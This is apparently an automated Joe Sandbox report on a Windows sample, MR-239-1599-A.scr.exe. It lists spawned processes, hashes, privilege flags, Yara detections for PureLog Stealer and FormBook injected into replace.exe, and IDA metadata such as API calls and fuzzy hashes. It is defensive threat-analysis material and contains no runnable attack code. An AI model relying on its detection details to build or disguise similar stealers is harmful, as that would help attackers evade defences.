                                                                                                                                                                                                        content-length: 93
                                                                                                                                                                                                        cache-control: no-cache
                                                                                                                                                                                                        content-type: text/html
                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:18:19:53
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\MR-239-1599-A.scr.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                                                                                                                                                                                                        Imagebase:0x980000
                                                                                                                                                                                                        File size:761'352 bytes
                                                                                                                                                                                                        MD5 hash:F53A5B00EAA86439C9BF502A7550F48A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1654874999.0000000007620000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1651899586.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                        Start time:18:19:55
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\MR-239-1599-A.scr.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                                                                                                                                                                                                        Imagebase:0xa0000
                                                                                                                                                                                                        File size:761'352 bytes
                                                                                                                                                                                                        MD5 hash:F53A5B00EAA86439C9BF502A7550F48A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                        Start time:18:19:55
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\MR-239-1599-A.scr.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                                                                                                                                                                                                        Imagebase:0x9a0000
                                                                                                                                                                                                        File size:761'352 bytes
                                                                                                                                                                                                        MD5 hash:F53A5B00EAA86439C9BF502A7550F48A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                        Start time:18:20:16
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe"
                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                        Start time:18:20:18
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\replace.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\replace.exe"
                                                                                                                                                                                                        Imagebase:0x6e0000
                                                                                                                                                                                                        File size:18'944 bytes
                                                                                                                                                                                                        MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                        Start time:18:20:34
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe"
                                                                                                                                                                                                        Imagebase:0x4c0000
                                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                        Start time:18:20:46
                                                                                                                                                                                                        Start date:08/05/2024
                                                                                                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                        Imagebase:0x7ff6bf500000
                                                                                                                                                                                                        File size:676'768 bytes
                                                                                                                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:8.6%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                          Signature Coverage:4%
                                                                                                                                                                                                          Total number of Nodes:126
                                                                                                                                                                                                          Total number of Limit Nodes:4

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1653348350.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5290000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: !$($($A$A$B$B$B$B$B$B$B$B$B$B$B$B$E$E$s
                                                                                                                                                                                                          • API String ID: 0-2059019390
                                                                                                                                                                                                          • Opcode ID: 9d5aa84b7a2f2aa0be874fba63c630cb3e7df2df4fcb644a66e17f2348b8737f
                                                                                                                                                                                                          • Instruction ID: 4a5fd8fd2ce07cbef36ff8443d830db6d58d7bf8f17c8181a29d7a70ca2776ff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d5aa84b7a2f2aa0be874fba63c630cb3e7df2df4fcb644a66e17f2348b8737f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7033F34A20215CFCB15DF68C894A99B7B2FF89300F1585E9E809AF365DB71AD85CF90

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1653348350.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5290000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: !$($($A$A$B$B$B$B$B$B$B$B$B$B$B$B$E$E$s
                                                                                                                                                                                                          • API String ID: 0-2059019390
                                                                                                                                                                                                          • Opcode ID: d5dce3adebf856e41298f9b1c7e5f47c07beef5f579bf3ac49ccf9aa9f871706
                                                                                                                                                                                                          • Instruction ID: 6aebf5d152c1d0a8e82cfcfe64452a2cd5a5414b8d0d4dcf71e942607594e88a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5dce3adebf856e41298f9b1c7e5f47c07beef5f579bf3ac49ccf9aa9f871706
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E033F34A20215CFCB15DF68C894A99B7B2FF89300F1585E9E809AF365DB71AD85CF90

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'^q$:$pbq$~
                                                                                                                                                                                                          • API String ID: 0-999388165
                                                                                                                                                                                                          • Opcode ID: 14d9a65a8ec1302cb92b6461a8c72c292b1a288aca18a9dc827a749225d375cb
                                                                                                                                                                                                          • Instruction ID: 246c75c77338760bd2d712a45306e568b3dac3edc744d73dbf25dc58eab37951
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14d9a65a8ec1302cb92b6461a8c72c292b1a288aca18a9dc827a749225d375cb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8422E275A00218EFDB15DF98C944E98BBB2FF59304F1580E9E609AB262D732ED91DF10

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                          • API String ID: 0-2125118731
                                                                                                                                                                                                          • Opcode ID: b6e4acd356ede6643c0c27652709b9134ac4cecddb2e1197bce18d09c1440b7b
                                                                                                                                                                                                          • Instruction ID: bc2b591c714193435f59d7d79d492fd71fb76941a0c94295d4e060cdf36d4f21
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6e4acd356ede6643c0c27652709b9134ac4cecddb2e1197bce18d09c1440b7b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7B19278A00118CFDB64DF68C990B9DBBB2FB99710F1085EAD909A7355DB319E81CF50

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Te^q$Te^q
                                                                                                                                                                                                          • API String ID: 0-3743469327
                                                                                                                                                                                                          • Opcode ID: fdb7c645e9ee9cea8229540b9ace16e4239c61bd1b461c1d69d3f7c1d6a021a3
                                                                                                                                                                                                          • Instruction ID: aec63442aadffc4de21cafde2b3d216303e4025c8702b74ef9c5708acfd5f154
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdb7c645e9ee9cea8229540b9ace16e4239c61bd1b461c1d69d3f7c1d6a021a3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CB1A3B4E002599FDB54DFA9C894B9DBBF2BB59300F1084A9D809EB355DB309A85CF50

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: {z}
                                                                                                                                                                                                          • API String ID: 0-1552007774
                                                                                                                                                                                                          • Opcode ID: aac2c2bc6c2f0ca69a5cfefbf7481092ebbc36662abc057d3694a19436423e1f
                                                                                                                                                                                                          • Instruction ID: 2b229b68c82fa2b9b85aaef0d7b08e37927110fae62c771d030405bdb9912830
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aac2c2bc6c2f0ca69a5cfefbf7481092ebbc36662abc057d3694a19436423e1f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22329DB4A002299FDB64DF68D994BDDBBB2BB59704F1081EAE449E7350DB309E81CF50

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02B0A5BE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1651748821.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b00000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 05293791
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1653348350.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5290000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CallProcWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2714655100-0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: [
                                                                                                                                                                                                          • API String ID: 0-784033777
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B0CC16,?,?,?,?,?), ref: 02B0CCD7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1651748821.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b00000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B0CC16,?,?,?,?,?), ref: 02B0CCD7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1651748821.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b00000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B0A639,00000800,00000000,00000000), ref: 02B0A84A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1651748821.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b00000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B0A639,00000800,00000000,00000000), ref: 02B0A84A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1651748821.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b00000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02B0A5BE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1651748821.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b00000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                          • API String ID: 0-1684325040
                                                                                                                                                                                                          • Opcode ID: 4faebab7d1dc11ab656542adee46cce58ee93acd275310711642a472aa5c5f48
                                                                                                                                                                                                          • Instruction ID: 071d58727b32722aa7d7d91c333260277750bab20dd02a3cefa4d96a28221bdf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4faebab7d1dc11ab656542adee46cce58ee93acd275310711642a472aa5c5f48
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE08CB095120EABCB00EFE4E44AAAC7BB89B0A301F1051A8E40A93250EA700B91C641
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 03b9e4fc2cd992560bcb2cb756dc9fd52512400a4970fd63c9077ee691f7af75
                                                                                                                                                                                                          • Instruction ID: e18f59bef9126355ea55c2cdd832ca3e2478abc91fd8477a125997b8edbe2b28
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03b9e4fc2cd992560bcb2cb756dc9fd52512400a4970fd63c9077ee691f7af75
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50C18DB4E002299FCB50CFA8D984A9DBBF1BB59314F118199E80DEB356D730AD85CF51
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 9eb293c91f146a9197a5e06dba38b00fa01aa744a8e0acaf783d20bcc92b43c7
                                                                                                                                                                                                          • Instruction ID: b069a9fa7d370340d8276896247042e62d8412c34ba799a869aa3bb4c7dbf7a0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9eb293c91f146a9197a5e06dba38b00fa01aa744a8e0acaf783d20bcc92b43c7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C519FB4B006099FCB15DF69C49CBA9BBB6AF99604F104569D105CB3A6CF71EC01CB51
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 1f02ed803c6d992367faff9fec9b8bedfab46a3917b606e19bcd7d8795efb41c
                                                                                                                                                                                                          • Instruction ID: 2a624c4442bbeea8a90da11d89d67539f9a1f2bcfcca241a13b8d91804dc51d1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f02ed803c6d992367faff9fec9b8bedfab46a3917b606e19bcd7d8795efb41c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F851B2B9E10209DFCB10DFA8D988ADDBBF5BB19318F205526E409EB315E730A941CF91
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1654976075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7760000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6e4257a810eaced316423081f5b268d6f7f197ffce00ddad3c75a4a2a5c2ff23
                                                                                                                                                                                                          • Instruction ID: 3e344de68e12b666753999db8ac177260f2c4869b4cabdf7e4864399c6fc0e37
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e4257a810eaced316423081f5b268d6f7f197ffce00ddad3c75a4a2a5c2ff23
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6851D6B4E011089FDB45DF99D484AEEBBB6FF89711F109429E806B7358CB349845CF50
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1654976075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7760000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
